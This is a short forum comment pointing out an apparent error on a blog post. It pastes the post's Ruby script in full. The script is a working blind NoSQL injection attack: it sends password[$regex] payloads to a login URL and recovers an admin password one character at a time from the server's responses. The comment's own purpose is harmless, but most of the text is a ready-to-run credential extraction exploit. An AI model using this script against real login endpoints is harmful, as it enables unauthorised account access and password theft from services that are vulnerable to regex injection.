|
|
|
|
|
|
by tissueapp
644 days ago
|
|
|
Very cool. I did see this comment (prob an error): In https://blog-project-fe0ba.web.app/post/REL7NZPjcBL7i19jtk2b Error:
require 'httpx' username = 'admin' password = '' url = 'http://example.org/login' # CHARSET = (?!..?~).to_a # all ASCII printable characters CHARSET = ['0'..'9','a'..'z','-'] # alphanumeric + '-' GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$'] session = HTTPX.plugin(:persistent) while true CHARSET.each do |c| unless GET_EXCLUDE.include?(c) payload = "?username=#{username}&password[$regex]=^#{password + c}" res = session.get(url + payload) if res.body.to_s.match?('Yeah') puts "Found one more char : #{password + c}" password += c end end end end |
|
|